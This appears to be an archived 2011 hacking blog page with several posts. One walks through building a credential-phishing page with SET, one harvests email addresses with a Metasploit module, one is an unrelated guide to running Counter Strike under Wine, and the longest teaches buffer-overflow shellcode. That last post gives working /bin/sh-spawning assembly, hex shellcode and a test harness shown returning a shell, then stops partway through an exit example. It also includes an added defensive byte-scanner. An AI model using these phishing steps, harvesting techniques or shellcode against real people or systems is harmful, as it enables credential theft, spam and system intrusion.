Break The security: learn to secure yourself and your server (blog by Indian4994)<br />
SET (Social-Engineer Toolkit) and Metasploit (2011-12-05)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV50B9ry-wAvcPuUkU1WeB71Ktzafs2MJr3iFETJiNDqOwtIzuHNnXia-_eUwMK9U5hEtTLGnHTfSbSpFvRJRgPjGQFJJrA6tdhnHWTwfVnMJCZMYd8X8fsYINKMj2hjw4qesqUnC2cqA/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A29%253A47++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV50B9ry-wAvcPuUkU1WeB71Ktzafs2MJr3iFETJiNDqOwtIzuHNnXia-_eUwMK9U5hEtTLGnHTfSbSpFvRJRgPjGQFJJrA6tdhnHWTwfVnMJCZMYd8X8fsYINKMj2hjw4qesqUnC2cqA/s320/Screenshot+-+Monday+05+December+2011+-+09%253A29%253A47++IST.png" width="320" /></a></div>
type:2<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwVHh8QoWK49UKqnq1LAxMwIenoX8VYAW5PKbqzZ0pjeFcpkXCiRDBn6CTP8QQ5q_30rhbFzSqJUI2feDI2d-i4-P12amQy-7ZXCbfuhTXRuVWJDQkSRhy3dwZAh32_7CDa3CPjGyHj8/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A01++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwVHh8QoWK49UKqnq1LAxMwIenoX8VYAW5PKbqzZ0pjeFcpkXCiRDBn6CTP8QQ5q_30rhbFzSqJUI2feDI2d-i4-P12amQy-7ZXCbfuhTXRuVWJDQkSRhy3dwZAh32_7CDa3CPjGyHj8/s320/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A01++IST.png" width="320" /></a></div>
type:3<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7oW9dtk9VbvW-dfMoGaOCj_UwwKcHopRc8Zek0ajI2Qfp6Vd1gwr6pyjKEpsli88VkEQ7M0Q5mnKkFjclNvdbIfz9MUNpqhPWM7V8jikPazmRTZUz5uWdbGV7yxI2mmNZ7tdgJKbRZJc/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A15++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7oW9dtk9VbvW-dfMoGaOCj_UwwKcHopRc8Zek0ajI2Qfp6Vd1gwr6pyjKEpsli88VkEQ7M0Q5mnKkFjclNvdbIfz9MUNpqhPWM7V8jikPazmRTZUz5uWdbGV7yxI2mmNZ7tdgJKbRZJc/s320/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A15++IST.png" width="320" /></a></div>
type:2<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggT_V7FZS2oOotT_cuZJ_87qpvjL_mYvkcxV7Eu1Y6TWFtk9uw9_hbNknX9f0mJAemrQkoJ-RwyDwyj6tzyVgITU3HlswflPPCzwuk8lies4UyWBZ_UEDQGEIXuH7pUidZTIUXeloDON8/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A48++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggT_V7FZS2oOotT_cuZJ_87qpvjL_mYvkcxV7Eu1Y6TWFtk9uw9_hbNknX9f0mJAemrQkoJ-RwyDwyj6tzyVgITU3HlswflPPCzwuk8lies4UyWBZ_UEDQGEIXuH7pUidZTIUXeloDON8/s320/Screenshot+-+Monday+05+December+2011+-+09%253A30%253A48++IST.png" width="320" /></a></div>
hit enter:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghPi6awq0CMN6Vc0TBniUiOApRt_Ws3jAHeBPhreVN9DLdqT6zXdO3H2QP6GrrAk3Z6kDKDS5Wi9CwGnqZFL-onkTwBRDz86fRmK5-tqzwhAlc11TQDCkpP_7hyphenhypheniRf4eHOyDTOfV_XJU8/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A00++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghPi6awq0CMN6Vc0TBniUiOApRt_Ws3jAHeBPhreVN9DLdqT6zXdO3H2QP6GrrAk3Z6kDKDS5Wi9CwGnqZFL-onkTwBRDz86fRmK5-tqzwhAlc11TQDCkpP_7hyphenhypheniRf4eHOyDTOfV_XJU8/s320/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A00++IST.png" width="320" /></a></div>
There you go. For the phishing page to be reachable you need to forward your IP, and your fake page is ready.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ3JW3bI3bGHL_RJeIsKcL5aKDCe_8FO3TteaI6u6OP-X5RDFS7QTqHVhyphenhyphentckBonypLvndx1ZounEzy-NN5UrzwgY3tu2KWCBiEyBGS8COB9pCOLrcKwGXAOsKYxJ-NWYylZPh3fn6l9I/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A29++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZ3JW3bI3bGHL_RJeIsKcL5aKDCe_8FO3TteaI6u6OP-X5RDFS7QTqHVhyphenhyphentckBonypLvndx1ZounEzy-NN5UrzwgY3tu2KWCBiEyBGS8COB9pCOLrcKwGXAOsKYxJ-NWYylZPh3fn6l9I/s320/Screenshot+-+Monday+05+December+2011+-+09%253A31%253A29++IST.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghf3vhOpXnVC1DG3Z1Fr9TccI-Uaf1diGN373-NpM42yhX5bxvFDbwpwONakcG4c2C5RIOG11Rg8gtjrtX_1OnobdzIGgLVpxJvHPrqrGx7MFYFnC8E_JeZF5r7qg0GqITaRYK9d0ZTqQ/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A16++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghf3vhOpXnVC1DG3Z1Fr9TccI-Uaf1diGN373-NpM42yhX5bxvFDbwpwONakcG4c2C5RIOG11Rg8gtjrtX_1OnobdzIGgLVpxJvHPrqrGx7MFYFnC8E_JeZF5r7qg0GqITaRYK9d0ZTqQ/s320/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A16++IST.png" width="320" /></a></div>
<br />That's it, you got the password.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDD0nagKS_6mwee-zrS90hyphenhyphennAamOVkFc-TFvRsgmFj8PNES4a8-q_ZVKaLpBfJbvHnmJPvRNNYmEJbgXqz5gckD_QLa8lzu99xZiC9p1XDF_Nf1dEconJ0isHU4rRhAkg9TtRaKACp8jE/s1600/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A58++IST.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDD0nagKS_6mwee-zrS90hyphenhyphennAamOVkFc-TFvRsgmFj8PNES4a8-q_ZVKaLpBfJbvHnmJPvRNNYmEJbgXqz5gckD_QLa8lzu99xZiC9p1XDF_Nf1dEconJ0isHU4rRhAkg9TtRaKACp8jE/s320/Screenshot+-+Monday+05+December+2011+-+09%253A32%253A58++IST.png" width="320" /><br /><br /><br /></a></div>
<br /></div>METASPLOIT EMAIL HARVESTING (2011-12-05)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="post_body" id="pid_17926652">
<span style="color: lightskyblue;">IN THIS TUT I WILL SHOW YOU HOW TO USE METASPLOIT TO GET A LIST OF EMAIL ADDRESSES </span><br />
<br />
<span style="color: dodgerblue;">OPEN TERMINAL AND TYPE</span><br />
<blockquote>
<cite>Quote:</cite>msfconsole</blockquote>
<br />
<img alt="[Image: NU7xE.png]" border="0" src="http://i.imgur.com/NU7xE.png" /><br />
<br />
<br />
<span style="color: dodgerblue;">NEXT STEP:</span><br />
<span style="color: dodgerblue;">NOW WE HAVE TO SEARCH FOR EXPLOIT BY TYPING</span><br />
<blockquote>
<cite>Quote:</cite>search gather </blockquote>
<img alt="[Image: Ib0ue.png]" border="0" src="http://i.imgur.com/Ib0ue.png" /><br />
<span style="color: deepskyblue;">YOU WILL FIND MANY EXPLOITS; THE ONE WE ARE GOING TO USE IS</span><br />
<span style="color: red;">auxiliary/gather/search_email_collector </span><br />
<img alt="[Image: UIQpF.png]" border="0" src="http://i.imgur.com/UIQpF.png" /><br />
<br />
<span style="color: dodgerblue;">NEXT STEP:<br />
SELECT THE EXPLOIT BY TYPING</span><br />
<blockquote>
<cite>Quote:</cite>use auxiliary/gather/search_email_collector </blockquote>
<img alt="[Image: fqYEW.png]" border="0" src="http://i.imgur.com/fqYEW.png" /><br />
<span style="color: dodgerblue;"><br />
NEXT STEP:<br />
NOW WE ARE GOING TO CONFIGURE THE EXPLOIT TO OUR NEEDS, FOR EXAMPLE SETTING THE
DOMAIN, BY TYPING [YOU CAN VIEW THE AVAILABLE OPTIONS BY TYPING
(SHOW OPTIONS) ]</span><br />
<blockquote>
<cite>Quote:</cite>set domain site.com</blockquote>
<img alt="[Image: FPtO8.png]" border="0" src="http://i.imgur.com/FPtO8.png" /><br />
<br />
<span style="color: dodgerblue;">NEXT STEP:<br />
AFTER SETTING THE DOMAIN WE ARE GOING TO RUN THE COLLECTOR<br />
BY TYPING</span><br />
<blockquote>
<cite>Quote:</cite>run</blockquote>
<img alt="[Image: mRcMu.png]" border="0" src="http://i.imgur.com/mRcMu.png" /><br />
<span style="color: dodgerblue;"><br />
NEXT STEP:<br />
NOW THE COLLECTOR WILL START COLLECTING THE EMAILS FROM GOOGLE,<br />
BING AND YAHOO</span><br />
<span style="color: dodgerblue;"><br />
NEXT STEP:<br />
BOOM, YOU GOT THE LIST </span><br />
<img alt="[Image: CXmuh.png]" border="0" src="http://i.imgur.com/CXmuh.png" /><br />
<span style="color: red;"><br />
HOPE YOU LIKE THIS TUT </span><br />
<span style="color: red;">PLEASE COMMENT AND REPLY</span><br />
<span style="color: red;">YOU CAN COPY-PASTE IT; IF POSSIBLE, GIVE CREDIT</span>
</div>
</div>Install and Play Counter Strike on Linux (2011-10-01)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj35S0towSx_2-o1d6IVuWeEwbZFzo5BiU6skf8sGRivPTTXMLM4EcaL9m20lyKDGGQ9igWmtVIQWzQK5Hdj1oOKASXKLu5d7guqsuT6bJ4QTYtfh6WBh3m1txYllk5v7lJ5mCTQzqyG8/s1600/xlarge_cs_go_impressions.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj35S0towSx_2-o1d6IVuWeEwbZFzo5BiU6skf8sGRivPTTXMLM4EcaL9m20lyKDGGQ9igWmtVIQWzQK5Hdj1oOKASXKLu5d7guqsuT6bJ4QTYtfh6WBh3m1txYllk5v7lJ5mCTQzqyG8/s320/xlarge_cs_go_impressions.jpg" width="320" /></a></div>
<b><span style="font-size: small;"><br />This article teaches you how to install, run and play Counter Strike on Ubuntu.<br />Counter Strike<br /><br />1. If you don't have Wine installed, first fire up your terminal and install it using the command below:<br />sudo apt-get install wine<br /><br />2. Download the Tahoma font, which Steam needs in order to function:<br />wget www.rzs.rs.ba/Fontovi/Tahoma.TTF<br /><br />3. Move the font to the Wine font directory:<br />mv Tahoma.TTF ~/.wine/drive_c/windows/fonts/<br /><br />Please don't leech this article; if you repost it, link back to the original URL.<br />4. Install Steam:<br /><br />a. If you have SteamInstall.exe downloaded, enter the following command to install it:<br /><br />wine SteamInstall.exe<br /><br />b. If you have SteamInstall.msi downloaded, enter the following command to install it:<br /><br />wine msiexec /i SteamInstall.msi<br /><br />5. Install Half-Life 2 from the CD:<br />wine msiexec /i /path/to/HL2/steam.msi<br /><br />6. Log in:<br />WINEDEBUG="fixme-all" wine Steam<br /><br />If you can't type in your login, just right-click on the Login edit control in the Steam window and then left-click on it again to make the menu disappear. Yahoo! You can type your login now.<br /><br />copyright @ securityowned.blogspot.com</span></b></div>
</div>
BUFFER OVERFLOW Shellcode: The Payload (2011-09-30)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b>SHELLCODE<br /><br />In order to execute our raw exploit code directly in the stack or in other parts of memory, which deal in binary, we need assembly code that represents a raw set of machine instructions for the target machine. A shellcode is an assembly language program which executes a shell, such as '/bin/sh' for the Unix/Linux shell, or the command.com shell on DOS and Microsoft Windows. Bear in mind that in an exploit we want not just a normal shell but a root shell or Administrator privileges (note: in certain circumstances on Windows there are accounts with privileges higher than Administrator, such as LocalSystem). Shellcode is used to spawn a (root) shell because it gives us the highest privilege. A shellcode may be used as an exploit payload, providing a hacker or attacker with command line access to a computer system. Shellcode is typically injected into computer memory by exploiting stack- or heap-based buffer overflow vulnerabilities, or format string attacks. In a classic exploit, shellcode execution is triggered by overwriting a stack return address with the address of the injected shellcode. As a result, instead of the subroutine returning to its caller, it returns to the shellcode, spawning a shell. 
Examples of shellcode may be in the following forms.<br /><br />As an assembly language program - shellcode.s (shellcode.asm for Windows):<br /><br /><pre>
#a very simple assembly (AT&T/Linux) program for spawning a shell
 .section .data
 .section .text
 .globl _start

_start:
 xor %eax, %eax
 mov $70, %al           #setreuid is syscall 70
 xor %ebx, %ebx
 xor %ecx, %ecx
 int $0x80

 jmp ender

starter:
 popl %ebx              #get the address of the string
 xor %eax, %eax
 mov %al, 0x07(%ebx)    #put a NULL where the N is in the string
 movl %ebx, 0x08(%ebx)  #put the address of the string
                        #to where the AAAA is
 movl %eax, 0x0c(%ebx)  #put 4 null bytes (%eax is 0) into where the BBBB is
 mov $11, %al           #execve is syscall 11
 lea 0x08(%ebx), %ecx   #load the address of where the AAAA was
 lea 0x0c(%ebx), %edx   #load the address of the NULLs
 int $0x80              #call the kernel

ender:
 call starter
 .string "/bin/shNAAAABBBB"
</pre>As a C program - shellcode.c:<br /><br /><pre>
#include <unistd.h>

int main(int argc, char *argv[])
{
    char *shell[2];

    shell[0] = "/bin/sh";
    shell[1] = NULL;           /* argv must be NULL-terminated */
    execve(shell[0], shell, NULL);
    return 0;                  /* only reached if execve fails */
}
</pre>Take note that assembly code can be embedded in C code using the __asm__ keyword, and asm for the reverse (GCC, Microsoft). 
As a null-terminated C string (char array) in a C program:<br /><br /><pre>
char shellcode[] = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
</pre>The shellcode declared as a C string of char type is probably the most widely used form in exploit code, and the typical format is shown below:<br /><br /><pre>
char shcode[] = "\x90\x31\x89...";
char shcode[] = {0x90,0x90,0x31,...};
</pre>In a wider definition, shellcode is not just used to spawn a shell; it can also be used to create a general payload. Generally an exploit consists of two major components:<br /><br /> The exploitation technique.<br /> The payload.<br /><br />The objective of the exploitation part is to divert the execution path of the vulnerable program. We can achieve that through one of the following techniques:<br /><br /> Stack-based buffer overflow.<br /> Heap-based buffer overflow.<br /> Integer overflow.<br /> Format string.<br /> Race condition.<br /> Memory corruption, etc.<br /><br />Once we control the execution path, we probably want it to execute our code. In this case, we need to include that code or instruction set in our exploit. The part of the code which allows us to execute arbitrary code is known as the payload. The payload can do virtually everything a computer program can do, with the permissions and rights of the vulnerable program or service.<br /><br /><br />Shellcode as a payload<br /><br />When a shell is spawned, it may be the simplest way for the attacker to explore the target system interactively. For example, it might give the attacker the ability to discover the internal network and to penetrate further into other computers. A shell may also allow uploading/downloading files or databases, which is usually needed as proof of a successful penetration test (pen-test). 
You may also easily install a Trojan horse, key logger, sniffer, enterprise worm, WinVNC, etc. A shell is also useful for restarting the vulnerable service to keep it running. More importantly, restarting the vulnerable service usually allows us to attack the service again. We may also clean up traces such as log files and events with a shell. On Windows we may alter the registry to make it run at every system start-up and to stop any antivirus programs.<br /><br />You can also create a payload that loops and waits for commands from the attacker. The attacker could issue a command to the payload to create a new connection, upload/download a file or spawn another shell. There are also a few other payload strategies in which the payload loops and waits for an additional payload from the attacker, such as in multistage exploits and (Distributed) Denial of Service (DDoS/DoS). Regardless of whether a payload spawns a shell or loops waiting for instructions, it still needs to communicate with the attacker, locally or remotely. There are so many things that can be done.<br /><br /><br />Shellcode elements<br /><br />This section limits the discussion to the payload used to exploit stack-based buffer overflows in binary, machine-readable programs. In such a program, the shellcode must also be machine-readable. The shellcode cannot contain any null bytes (0x00). Null ('\0') is the string delimiter which instructs all C string functions (and other similar implementations) to stop processing the string once it is found (a null-terminated string). Depending on the platform, not just the NULL byte but other delimiters such as linefeed (LF, 0x0A), carriage return (CR, 0x0D), backslash ( \ ) and the NOP (No Operation) instruction must also be considered when creating workable shellcode. In the best case the shellcode may contain only alphanumeric characters. 
Fortunately, there are several programs, called encoders, that can be used to eliminate NULL and other delimiter characters.<br /><br />In order to generate machine code that really works, you have to write the assembly code differently but still have it serve its purpose. You need to do some tricks here and there to produce the same result as the optimal machine code.<br /><br />Since it is important that the shellcode be as small as possible, the shellcode writer usually writes the code in assembly language, then extracts the opcodes in hexadecimal format and finally uses the code in a program as a string variable. Reliable standard libraries are not available to shellcode; we usually have to use the kernel syscalls (system calls) of the operating system directly. Shellcode is also OS- and architecture-dependent. Workable shellcode must also consider bypassing network protection such as firewalls and Intrusion Detection Systems (IDS).<br /><br /><br />Creating a shellcode: Making the code portable<br /><br />Writing shellcode is slightly different from writing normal assembly code, and the main difference is the portability issue. Since we do not know which address we are at, it is not possible to access our data, and even less possible to hardcode a memory address directly in our program. We have to apply a trick to be able to write shellcode without referencing its arguments in memory the conventional way, by giving their exact address on the memory page, which can only be done at compile time. Although this is a significant disadvantage, there are always workarounds for this issue. 
The easiest way is to use a string or data in the shellcode, as shown in the following simple example.<br /><br /><pre>
 .section .data
 #only use registers here...

 .section .text

 .globl _start

 jmp dummy      #note: as a linked ELF the entry point is _start, so this jmp
                #only runs when the bytes are executed from their first byte

_start:
 #pop a register, so we know the string location
 #Here we have assembly instructions which will use the string

dummy:
 call _start

 .string "Simple String"
</pre>What occurs in this code is that we jmp to the label dummy and from there call the _start label. Once we are at the _start label, we can pop a register, which will cause that register to contain the location of our string. CALL is used because it automatically stores the return address on the stack. As discussed before, the return address is the address immediately following the CALL instruction. By placing a variable right behind the call, we indirectly push its address on the stack without having to know it. This is a very useful trick when we do not know where our code will be executed from. 
The code arrangement example using C can be illustrated as follows.<br /><br />Example:<br /><br /><pre>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;

    /*int execve(const char *file, char *const argv[], char *const envp[])*/
    execve(name[0], name, NULL);
    exit(0);
}
</pre>Register usage:<br /><br /> EAX: 0xb – syscall number.<br /> EBX: Address of the program name (address of name[0]).<br /> ECX: Address of the null-terminated argument vector, argv (address of name).<br /> EDX: Address of the null-terminated environment vector, env/envp (NULL).<br /><br />In this program, we need:<br /><br /> The string /bin/sh somewhere in memory.<br /> The address of the string.<br /> The string /bin/sh followed by a NULL somewhere in memory.<br /> The address of the address of the string.<br /> A NULL somewhere in memory.<br /><br />To determine the address of the string we can make use of instructions that use relative addressing. We know that the call instruction saves EIP on the stack and jumps to the function, so:<br /><br /> Use a jmp instruction at the beginning of the shellcode to reach the CALL instruction.<br /> Put the call instruction right before the /bin/sh string.<br /> The call jumps back to the first instruction after the jump.<br /> Now the address of /bin/sh should be on the stack.<br /><br />Figure 1: A trick to determine the address of the string.<br /><br />If you are going to write code more complex than just spawning a simple shell, you can put more than one .string behind the CALL. Here, you know the size of those strings and can therefore calculate their relative locations once you know where the first string is located. With this knowledge, let's try creating a simple shellcode that spawns a shell. 
The main points here are the similar process and steps that can be followed to create shellcode. The following is a simple program example to spawn a shell in assembly (AT&T/Linux).<br /><br /><pre>
#assembly (AT&T/Linux) for spawning a shell
####### testshell2.s ############

 .section .data
 .section .text
 .globl _start

_start:
 xor %eax, %eax         #clear register
 mov $70, %al           #setreuid is syscall 70
 xor %ebx, %ebx         #clear register, empty
 xor %ecx, %ecx         #clear register, empty
 int $0x80              #interrupt 0x80

 jmp ender

starter:
 popl %ebx              #get the address of the string, in %ebx
 xor %eax, %eax         #clear register
 mov %al, 0x07(%ebx)    #put a NULL where the N is in the string
 movl %ebx, 0x08(%ebx)  #put the address of the string to where the AAAA is
 movl %eax, 0x0c(%ebx)  #put 4 null bytes into where the BBBB is
 mov $11, %al           #execve is syscall 11
 lea 0x08(%ebx), %ecx   #load the address of where the AAAA was
 lea 0x0c(%ebx), %edx   #load the address of the NULLs
 int $0x80              #call the kernel

ender:
 call starter
 .string "/bin/shNAAAABBBB"   #16 bytes of string...
</pre>Basically, before the call starter the memory arrangement should be something like this (little endian):<br /><br />Figure 2: Memory arrangement for our assembly code.<br /><br />When the starter: portion is executed the memory arrangement should be something like this:<br /><br />Figure 3: Memory arrangement for our shellcode.<br /><br />Where:<br /> a - Address of the string<br /><br />Let's compile and link the program and then disassemble it to get the equivalent hexadecimal opcodes.<br /><br /><pre>
[bodo@lethalcode testbed8]$ as testshell2.s -o testshell2.o
[bodo@lethalcode testbed8]$ ld testshell2.o -o testshell2
[bodo@lethalcode testbed8]$ objdump -d testshell2

testshell2: file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074: 31 c0                 xor %eax, %eax
 8048076: b0 46                 mov $0x46, %al
 8048078: 31 db                 xor %ebx, %ebx
 804807a: 31 c9                 xor %ecx, %ecx
 804807c: eb 16                 jmp 8048094 <ender>

0804807e <starter>:
 804807e: 5b                    pop %ebx
 804807f: 31 c0                 xor %eax, %eax
 8048081: 88 43 07              mov %al, 0x7(%ebx)
 8048084: 89 5b 08              mov %ebx, 0x8(%ebx)
 8048087: 89 43 0c              mov %eax, 0xc(%ebx)
 804808a: b0 0b                 mov $0xb, %al
 804808c: 8d 4b 08              lea 0x8(%ebx), %ecx
 804808f: 8d 53 0c              lea 0xc(%ebx), %edx
 8048092: cd 80                 int $0x80

08048094 <ender>:
 8048094: e8 e5 ff ff ff        call 804807e <starter>
 8048099: 2f                    das
 804809a: 62 69 6e              bound %ebp, 0x6e(%ecx)
 804809d: 2f                    das
 804809e: 73 68                 jae 8048108 <ender+0x74>
 80480a0: 4e                    dec %esi
 80480a1: 41                    inc %ecx
 80480a2: 41                    inc %ecx
 80480a3: 41                    inc %ecx
 80480a4: 41                    inc %ecx
 80480a5: 42                    inc %edx
 80480a6: 42                    inc %edx
 80480a7: 42                    inc %edx
 80480a8: 42                    inc %edx
 ...
</pre>Next, arrange the hexadecimal opcodes in a char type array (C string).<br /><br /><pre>
char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
              "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
              "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
</pre>Finally, insert the shellcode into our test program, then compile and run it.<br /><br /><pre>
/*test.c*/
#include <unistd.h>

/* global, writable array: the code patches its own string, and
   execstack -s below is what makes it executable on this system */
char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
              "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
              "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

int main(int argc, char **argv)
{
    /*creating a function pointer*/
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
    return 0;
}

[bodo@lethalcode testbed8]$ gcc -g test.c -o test
[bodo@lethalcode testbed8]$ execstack -s test
[bodo@lethalcode testbed8]$ ./test
sh-3.00$
</pre>Well, it works. Now, let's try another example using a simple C program. 
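Before that, an added example that is not part of the original article, written from the analyst's side: it scans a byte buffer for the delimiter bytes the "Shellcode elements" section says must be absent, and detects the jmp/call/pop address-finding trick from the portability section. The 55-byte execve sequence just extracted and the naive exit(0) encoding (mov $1,%eax; mov $0,%ebx; int $0x80) are embedded as constructed inputs; the function names are this example's own.

```c
/* Added example, not from the original article: two static checks an
 * analyst can run over a byte buffer suspected to be shellcode.
 *  - bad_byte_scan(): offset of the first delimiter byte (NUL, LF, CR, '\')
 *    that would truncate the buffer when copied as a C string, or -1.
 *  - find_jmp_call_pop(): offset of a jmp-short/call-back/pop "get PC"
 *    idiom, plus the offset of the data the pop recovers, or -1.
 * The sample buffers are constructed from the byte listings in the article. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 55-byte execve("/bin/sh") sequence extracted from testshell2.s above. */
static const uint8_t EXECVE_55[] = {
    0x31, 0xc0, 0xb0, 0x46, 0x31, 0xdb, 0x31, 0xc9, 0xcd, 0x80, 0xeb,
    0x16, 0x5b, 0x31, 0xc0, 0x88, 0x43, 0x07, 0x89, 0x5b, 0x08, 0x89,
    0x43, 0x0c, 0xb0, 0x0b, 0x8d, 0x4b, 0x08, 0x8d, 0x53, 0x0c, 0xcd,
    0x80, 0xe8, 0xe5, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
    0x73, 0x68, 0x4e, 0x41, 0x41, 0x41, 0x41, 0x42, 0x42, 0x42, 0x42
};

/* Naive exit(0): mov $1,%eax; mov $0,%ebx; int $0x80, as objdump shows
 * for the exit example; the 32-bit immediates bring in NUL bytes. */
static const uint8_t EXIT_NAIVE[] = {
    0xb8, 0x01, 0x00, 0x00, 0x00, 0xbb, 0x00, 0x00, 0x00, 0x00, 0xcd, 0x80
};

/* Delimiters the article lists: NUL, linefeed, carriage return, backslash. */
static const uint8_t BAD_BYTES[] = { 0x00, 0x0a, 0x0d, 0x5c };

/* Offset of the first delimiter byte, or -1 when the buffer is clean. */
int bad_byte_scan(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < sizeof BAD_BYTES; j++)
            if (buf[i] == BAD_BYTES[j])
                return (int)i;
    return -1;
}

/* 1 if every byte is [0-9A-Za-z], the best case the article mentions. */
int is_alphanumeric_only(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        uint8_t c = buf[i];
        if (!((c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') ||
              (c >= 'a' && c <= 'z')))
            return 0;
    }
    return 1;
}

/* Pattern: at i "eb rel8" (rel8 > 0); at i+2 a "pop r32" (0x58..0x5f);
 * at i+2+rel8 "e8 rel32" whose target is exactly i+2.  The data whose
 * address the pop recovers starts right after the 5-byte call. */
int find_jmp_call_pop(const uint8_t *buf, size_t len, size_t *data_off)
{
    for (size_t i = 0; i + 2 <= len; i++) {
        if (buf[i] != 0xeb || (int8_t)buf[i + 1] <= 0)
            continue;
        size_t pop_at  = i + 2;
        size_t call_at = pop_at + buf[i + 1];
        if (call_at + 5 > len || buf[call_at] != 0xe8)
            continue;
        if (buf[pop_at] < 0x58 || buf[pop_at] > 0x5f)
            continue;
        uint32_t rel32 = (uint32_t)buf[call_at + 1]
                       | (uint32_t)buf[call_at + 2] << 8
                       | (uint32_t)buf[call_at + 3] << 16
                       | (uint32_t)buf[call_at + 4] << 24;
        /* rel32 is relative to the end of the call; uint32_t wrap-around
         * arithmetic handles the negative (backward) displacement. */
        if ((uint32_t)(call_at + 5) + rel32 != (uint32_t)pop_at)
            continue;
        *data_off = call_at + 5;
        return (int)i;
    }
    return -1;
}

int main(void)
{
    size_t data;
    printf("execve sequence: first bad byte at %d\n",
           bad_byte_scan(EXECVE_55, sizeof EXECVE_55));
    printf("naive exit sequence: first bad byte at %d\n",
           bad_byte_scan(EXIT_NAIVE, sizeof EXIT_NAIVE));
    int at = find_jmp_call_pop(EXECVE_55, sizeof EXECVE_55, &data);
    if (at >= 0)
        printf("jmp/call/pop at offset %d, data at offset %zu: \"%.7s\"\n",
               at, data, (const char *)EXECVE_55 + data);
    return 0;
}
```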
In this example we use the system call for exit(0), that is, exit with no error, and the program is shown below.<br /><br /><pre>
/* exit.c */
#include <stdlib.h>   /* exit() lives in stdlib.h, not unistd.h */

int main()
{
    exit(0);
}
</pre>Do some verification.<br /><br /><pre>
[bodo@lethalcode testbed7]$ gcc -g exit.c -o exit
[bodo@lethalcode testbed7]$ execstack -s exit
